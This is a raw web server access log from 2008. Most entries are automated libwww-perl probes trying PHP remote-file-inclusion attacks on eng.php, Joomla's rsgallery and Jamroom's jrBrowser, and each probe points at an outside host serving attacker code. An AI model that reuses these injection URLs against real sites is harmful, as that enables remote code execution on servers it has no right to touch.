66.221.210.103 - - [06/Sep/2008:01:55:24 -0400] "GET //eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:55:24 -0400] "GET /logs//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:56:02 -0400] "GET /logs/access_log.Q108052800//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Sep/2008:01:56:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.221.210.103 - - [06/Sep/2008:01:57:13 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:57:19 -0400] "GET /logs/access_log.Q108081700//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
66.249.67.114 - - [06/Sep/2008:01:56:18 -0400] "GET /logs/access_log.Q107122100 HTTP/1.1" 200 1769155 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.150.189.10 - - [06/Sep/2008:01:58:28 -0400] "GET /scanhttp://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
200.150.189.10 - - [06/Sep/2008:01:58:28 -0400] "GET /logs/scanhttp://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
200.150.189.10 - - [06/Sep/2008:01:58:28 -0400] "GET /logs/error_log.Q108081400/scanhttp://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
200.150.189.10 - - [06/Sep/2008:01:58:32 -0400] "GET /logs/error_log.Q108081200/scanhttp://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
151.11.24.250 - - [06/Sep/2008:01:59:19 -0400] "GET /logs/access_log.Q108082400//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:59:19 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:59:19 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:59:40 -0400] "GET /logs/access_log.Q108071700//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
